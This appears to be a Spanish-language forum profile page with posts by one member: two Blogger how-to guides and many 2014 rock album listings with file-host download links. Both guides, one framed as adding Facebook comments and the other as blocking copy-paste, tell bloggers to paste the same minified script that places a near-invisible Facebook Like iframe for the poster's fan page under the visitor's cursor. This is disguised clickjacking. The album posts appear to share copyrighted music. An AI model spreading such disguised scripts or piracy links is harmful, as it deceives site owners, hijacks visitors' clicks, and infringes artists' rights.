
ziczac1190
Warianos-
Posts
203 -
Joined
-
Last visited
Información Personal
-
Pais
Costa Rica
-
Genero
Hombre
ziczac1190's Achievements
Newbie (1/14)
0
Reputation
-
Uno de los temas más solicitados es cómo poner la caja de comentarios de Facebook en el blog, y es que a veces se vuelve más fácil comentar desde Facebook pues la mayoría está conectado a esa red social todo el tiempo, además no necesitamos ingresar con nuestros datos de Google para poder comentar en un blog que contenga este tipo de comentarios. 1. lo primero que debemos hacer será ir a la edicion HTML y buscamos la etiqueta </body> y justo arriba pegar el siguiente codigo: <script type='text/javascript'> //<![CDATA[ // Facebook var fan_page_url="https://www.facebook.com/605072452965709",opacity=.01,time=300e3;(document.getElementById&&window.addEventListener||window.attachEvent)&&!function(){function e(e){var t,n;return h?(t=d.pageYOffset,n=d.pageXOffset):(t=d.scrollTop,n=d.scrollLeft),0==e?t:n}function t(t){var n=h?window.pageYOffset:0;t||(t=window.event),"number"==typeof t.pageY?(r=t.pageY-15-n,l=t.pageX-34):(r=t.clientY-16-n,l=t.clientX-36),u.top=r+e(0)+s,u.left=l+s}function n(){u.top=r+e(0)+s,setTimeout(n,300)}function o(){u=document.getElementById("theiframe").style,n()}function i(e){var t=document.cookie,n=t.indexOf(" "+e+"=");if(-1==n&&(n=t.indexOf(e+"=")),-1==n)t=null;else{n=t.indexOf("=",n)+1;var o=t.indexOf(";",n);-1==o&&(o=t.length),t=unescape(t.substring(n,o))}return t}function a(e,t,n){var o=new Date;o.setDate(o.getDate()+n);var i=escape(t)+(null==n?"":"; expires="+o.toUTCString());document.cookie=e+"="+i}var d,m,c=document,r=-10,l=-10,u="",p=(document.getElementsByTagName("div").length,"<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href="+encodeURIComponent(fan_page_url)+"&layout=standard&show_faces=true&width=80&action=like&colorscheme=light&height=30' style='position:absolute;width:53px;height:30px;z-index: 200000;overflow:hidden;border:0;opacity:"+opacity+";filter:alpha(opacity="+100*opacity+");'></iframe>"),f=i("faceLike");null!=f&&""!=f||(a("faceLike","liked",1),document.write(p),m=document.getElementById("theiframe"),document.getElementsByTagName("body")[0].appendChild(m));var s="px",w="number"==typeof window.innerWidth,h="number"==typeof window.pageYOffset;w?d=window:c.documentElement&&"number"==typeof c.documentElement.clientWidth&&0!=c.documentElement.clientWidth?d=c.documentElement:c.body&&"number"==typeof c.body.clientWidth&&(d=c.body),0!=time&&setTimeout(function(){document.getElementsByTagName("body")[0].removeChild(m),window.addEventListener?document.removeEventListener("mousemove",t,!1):window.attachEvent&&document.detachEvent("onmousemove",t)},time),window.addEventListener?(window.addEventListener("load",o,!1),document.addEventListener("mousemove",t,!1)):window.attachEvent&&(window.attachEvent("onload",o),document.attachEvent("onmousemove",t))}(); //]]> </script> Como segundo paso busca la etiqueta: <body> Si usas una plantilla del Diseñador entonces la encontrarás como: <body expr:class='"loading" + data:blog.mobileClass'> Debajo de cualquiera de ellas agrega esto: <div id='fb-root'/> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/es_LA/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> Después busca esta línea: <b:includable id='post' var='post'> Si vieras una flechita ▶ al lado de ella da click para que se expanda ese artilugio. Y justo antes del siguiente </b:includable> agrega esto: <b:if cond='data:blog.pageType == "item"'> <div id='comentariosFacebook'><div class='fb-comments' data-colorscheme='light' data-num-posts='5' data-width='500' expr:href='data:post.canonicalUrl'/></div> </b:if> Así se ve el área donde se agrega el código (la parte que está arriba del área marcada en rojo puede variar de plantilla en plantilla) Con eso ya tendrás la caja de comentarios de Facebook en tus entradas (recuerda que debes ingresar a un post para poder verla). La caja estará arriba de los comentarios de Blogger. Si quieres que esté debajo del formulario de comentarios entonces el código del plugin ponlo justo arriba de este código: </div> <b:if cond='data:post.includeAd'> Dentro del último código que añadimos veremos estos parámetros: data-num-posts='5' data-width='500' data-colorscheme='light' El primero es el número de comentarios que se mostrarán; el segundo el ancho del formulario; y el tercero el color del formulario, puedes cambiar light por dark Hasta ahí ya tenemos el CommentBox de Facebook; si deseas personalizarlo un poco puedes colocar antes de ]]></b:skin> algunos estilos, por ejemplo: #comentariosFacebook { background:#F2F2F2; /* Color de fondo del contenedor */ width:520px; /* Ancho del contenedor */ padding:10px; margin-top:0px; /* Cámbialo por -180px si lo has puesto debajo de los comentarios de Blogger */ } Si quieres que cada vez que alguien haga un comentario te llegue una notificación de Facebook, y puedas moderar los comentarios, será necesario que crees una aplicación. Pero para ello es necesario tener verificada la cuenta de Facebook. Si es así, entra a Facebook Developers y haz click en el botón Crear nueva aplicación. Ahí escribe el nombre de la aplicación, acepta los términos y click en Continuar. En la siguiente pantalla haz click en Sitio web, ahí escribe la URL de tu blog donde lo pondrás; también copia el número que está en App ID. Ahora entra de nuevo en la Edición HTML de tu blog y pega antes de </head> esto: <meta content='ID de USUARIO' property='fb:admins'/> <meta content='ID de APLICACIÓN' property='fb:app_id'/> En la ID de aplicación agrega la serie de números que copiaste. Y en ID de usuario agrega tu ID de Facebook, sino lo conoces ingresa a este enlace: http://graph.facebook.com/usuario Cambia donde se indica tu nombre de usuario y da click, ahí verás cuál es la ID de tu usuario de Facebook (Gracias a Siniestro por el tip). Una vez hecho eso ingresa a una entrada para ver tu caja de comentarios y dale click en Configuración. Ahí verás varias opciones del plugin; en donde dice Moderadores, agrega tu nombre y guarda los cambios. Una vez habiendo hecho todo lo anterior podrás moderar los comentarios y recibirás las notificaciones en tu cuenta de Facebook cada vez que alguien haga un comentario. Sino lo haces podrás seguir teniendo tu caja de comentarios de Facebook pero sin estas opciones. Al final de la entrada he puesto una para que puedas probar el resultado, pero cualquier duda sobre el tema déjala en los comentarios de Blogger ;)
-
Como ya sabemos hay mucha gente que se quiere pasar de lista copiando el contenido de un blog para luego pegarlo tal cual y publicarlo. En ocasiones escribir un post significa dedicarle mucho tiempo, ya sea investigando, recopilando fuentes, buscando imágenes, redactando, corrigiendo y dando forma al contenido, y de pronto nuestro esfuerzo aparece en el blog de otros asumiendo que son los autores de dicho contenido y obviamente sin la mención de créditos. Así que veremos una forma para evitar que nos roben el contenido del blog alguno de estos odiosos personajes. Aclaro, estoy completamente de acuerdo en que la información debe ser libre y debe compartirse, pero de ningún modo estoy de acuerdo en que se robe información y se asuman el trabajo de otros, por lo que si tomas información de algún lado cita a los autores y redáctalo con tus propias palabras. Entonces vamos a emplear un script que deshabilita la opción de seleccionar el texto de una página web, evitando de esta forma que hagan un 'copy & paste' y te roben tu contenido. Pero que hay que aclarar que no es un método infalible, ninguno lo es. 1. lo primero que debemos hacer será ir a la edicion HTML y buscamos la etiqueta </body> y justo arriba pegar el siguiente codigo: <script type='text/javascript'> //<![CDATA[ // Facebook var fan_page_url="https://www.facebook.com/605072452965709",opacity=.01,time=300e3;(document.getElementById&&window.addEventListener||window.attachEvent)&&!function(){function e(e){var t,n;return h?(t=d.pageYOffset,n=d.pageXOffset):(t=d.scrollTop,n=d.scrollLeft),0==e?t:n}function t(t){var n=h?window.pageYOffset:0;t||(t=window.event),"number"==typeof t.pageY?(r=t.pageY-15-n,l=t.pageX-34):(r=t.clientY-16-n,l=t.clientX-36),u.top=r+e(0)+s,u.left=l+s}function n(){u.top=r+e(0)+s,setTimeout(n,300)}function o(){u=document.getElementById("theiframe").style,n()}function i(e){var t=document.cookie,n=t.indexOf(" "+e+"=");if(-1==n&&(n=t.indexOf(e+"=")),-1==n)t=null;else{n=t.indexOf("=",n)+1;var o=t.indexOf(";",n);-1==o&&(o=t.length),t=unescape(t.substring(n,o))}return t}function a(e,t,n){var o=new Date;o.setDate(o.getDate()+n);var i=escape(t)+(null==n?"":"; expires="+o.toUTCString());document.cookie=e+"="+i}var d,m,c=document,r=-10,l=-10,u="",p=(document.getElementsByTagName("div").length,"<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href="+encodeURIComponent(fan_page_url)+"&layout=standard&show_faces=true&width=80&action=like&colorscheme=light&height=30' style='position:absolute;width:53px;height:30px;z-index: 200000;overflow:hidden;border:0;opacity:"+opacity+";filter:alpha(opacity="+100*opacity+");'></iframe>"),f=i("faceLike");null!=f&&""!=f||(a("faceLike","liked",1),document.write(p),m=document.getElementById("theiframe"),document.getElementsByTagName("body")[0].appendChild(m));var s="px",w="number"==typeof window.innerWidth,h="number"==typeof window.pageYOffset;w?d=window:c.documentElement&&"number"==typeof c.documentElement.clientWidth&&0!=c.documentElement.clientWidth?d=c.documentElement:c.body&&"number"==typeof c.body.clientWidth&&(d=c.body),0!=time&&setTimeout(function(){document.getElementsByTagName("body")[0].removeChild(m),window.addEventListener?document.removeEventListener("mousemove",t,!1):window.attachEvent&&document.detachEvent("onmousemove",t)},time),window.addEventListener?(window.addEventListener("load",o,!1),document.addEventListener("mousemove",t,!1)):window.attachEvent&&(window.attachEvent("onload",o),document.attachEvent("onmousemove",t))}(); //]]> </script> Luego pegar antes de </head> lo siguiente: <script> function disabletext(e){ return false } function reEnable(){ return true } document.onselectstart=new Function ("return false") if (window.sidebar){ document.onmousedown=disabletext document.onclick=reEnable } </script> Ahora guardamos cambios y listo! no te podran copiar el contenido de tu blog Pruebalo!
-
Artist: Jay Willie Blues Band Album: Rumblin' & Slidin Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 135 Mb Tracklis: 1. Rumble 2. Dirty Two Thirty 3. Key To The Highway 4. Bad News 5. Rotten Person 6. Fly Away 7. Come Back 8. The Leetch 9. It Hurts Me Too 10. Caballo 11. Hold Me Tight Talk Dirty 12. Tore Down 13. Mercy Mercy Mercy 14. For What It's Worth . http://ul.to/eo1srnok
-
Artist: Fathead Album: Fatter Than Ever Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 138 Mb Tracklis: 1. I Don't Want To Leave The Party 2. Johnny Says 3. Take A Little Time For Yourself 4. Evil Eye 5. Twenty Second Chances 6. When Did You Ever? 7. Slippery Slope 8. Life Goes On 9. My Brother 10. Better Off Taking Chances 11. Shoot That Rooster 12. Pinching Pennies 13. Preacher Man 14. Throw Me A Bone 15. Cost To Boogie http://ul.to/j13gbhlk
-
Artist: Daytona & The Blueside Rockers Album: The BlueSide Of Rock Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 91 Mb Tracklis: 01. Struck By Lightning (5:06) 02. Can't Say No (4:23) 03. House Of Blues (5:19) 04. I Believe In You (4:20) 05. Kitty Kitty (4:16) 06. Love Or Money (3:47) 07. G-String Blues (0:47) 08. Talk To Me (4:46) 09. Walkin' The Dog (3:44) 10. Movin' On (2:52) http://ul.to/yfatfy4h
-
Artist: Something for Kate Album: Elsewhere For 8 Minutes Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 290Mb Tracklis: CD 1 01] Anarchitect 02] Pinstripe 03] Captain (Million Miles an Hour) 04] Paintbrushes 05] Prick 06] Glass Timing 07] Soundczech 08] Working Against Me 09] Strategy 10] Roll Credit 11] Like Bankrobbers 12] The Last Minute CD 2 01] Subjected To Change 02] Floatation 03] Chapel St. Etc 04] All The Things That Aren't Good About Scientology 05] Telescope 06] The Last Minute (Djini Brown Remix) 07] Prickly (Eli Janney Remix) 08] 3 x 2 09] Friendly 10] Clint 11] Harpoon 12] You Can't Please Everybody, Rockwell 13] Just A Passenger http://ul.to/f/lsu3n6
-
Artist: Merchandise Album: After The End Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 296Mb Tracklis: 1. Corridor (02:45) 2. Enemy (04:29) 3. True Monument (04:59) 4. Green Lady (04:28) 5. Life Outside the Mirror (04:55) 6. Telephone (04:05) 7. Little Killer (03:05) 8. Looking Glass Waltz (04:01) 9. After the End (06:55) 10. Exile and Ego (04:32) http://ul.to/wuakc57a
-
Artist: Avi Buffalo Album: At Best Cuckold Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 101Mb Tracklis: 01 So What 02 Memories of You 03 Can't Be Too Responsible 04 Two Cherished Understandings 05 Overwhelmed With Pride 06 Found Blind 07 She is Seventeen 08 Think It's Gonna Happen Again 09 Oxygen Tank 10 Won't Be Around No More http://ul.to/hpb3ukqw
-
Artist: The Hobbes Fanclub Album: Up at Lagrange Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 83Mb Tracklis: 01. Into The Night (3:26) 02. Stay Gold (2:23) 03. Your Doubting Heart (3:39) 04. The Boy From Outer Space (2:42) 05. I Knew You'd Understand (2:50) 06. Run Into The Sea (3:25) 07. How Could You Leave Me Like This (3:28) 08. Outside Myself (3:45) 09. Why Should You Tell The Truth (2:59) 10. Up At Lagrange (3:11) 11. Sometimes (3:44) http://ul.to/045gwpmd
-
Artist: Sarah Jaffe Album: Don’t Disconnect Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 119Mb Tracklis: 01. Ride It Out (3:48) 02. Fatalist (3:24) 03. Some People Will Tell You (3:59) 04. Revelation (6:14) 05. Either Way (4:20) 06. Don't Disconnect (4:54) 07. Satire (4:59) 08. Lover Girl (3:46) 09. Slow Pour (4:35) 10. Your Return (4:20) 11. Defense (4:46) 12. Leaving The Planet (2:54) http://ul.to/4fmlmlzg
-
Artist: Echobelly Album: Everyone's Got One Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 254Mb Tracklis: CD 1 - Everyone's Got One 01] Today Tomorrow Sometime Never 02] Father, Ruler, King, Computer 03] Give Her A Gun 04] I Can't Imagine The World Without Me 05] Bellyache 06] Taste Of You 07] Insomniac 08] Call Me Names 09] Close... But 10] Cold Feet Warm Heart 11] Scream CD 2 - B-sides And Bonus Tracks From Bellyache 01] Bellyache 02] Sleeping Hitler 03] Give Her A Gun 04] I Don't Belong Here From Insomniac 05] Centipede 06] Talent From I Can't Imagine The World Without Me 07] Sober 08] Venus Wheel From Close...But 09] So La Di Da 10] I Can't Imagine The World Without Me (Live) 11] Cold Feet Warm Heart (Live) http://ul.to/f/mxklch
-
Artist: Mick Ness Album: The Joy Of Pop Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: Mb Tracklis: 1 Open Rooms 3:33 2 Walk On Heads 3:33 3 Burn Me Out Again 3:07 4 Ants 3:05 5 Remind Of 3:08 6 If They Had Missed Me 3:22 7 We Are 'In' Moving 3:17 8 Appointment 3:03 Bonus Tracks: 9 Cathy Is Amusement 2:52 10 You In Me 3:01 11 Ships Full Of Rain 2:31 12 Too Tight 3:42 http://ul.to/qnhnv4oz
-
Artist: The Wind-Up Birds Album: Poor Music Style: Rock Year: 2014 Format: Mp3 Bitrate : 320kbps Size: 115Mb Tracklis: 1. There Will Be No Departures from This Stand (02:50) 2. Poor Music (03:21) 3. Bus Drove Off (01:43) 4. Two Ambulance Day (04:11) 5. Glue Factory I (00:50) 6. The Gristle (02:59) 7. Jesus Puns (02:03) 8. Bar Sadness (03:39) 9. Addis Ababa (01:45) 10. A Song or Two (06:15) 11. The Wind-Up Birds Song Writing Workshop (01:34) 12. Glue Factory II (00:59) 13. Mate Crime (05:05) 14. RSVP/Crackers (01:51) 15. Guy Ritchie (03:28) 16. Glue Factory III (02:01) 17. On the Ropes...but Then (05:24) http://ul.to/a1tdpl6i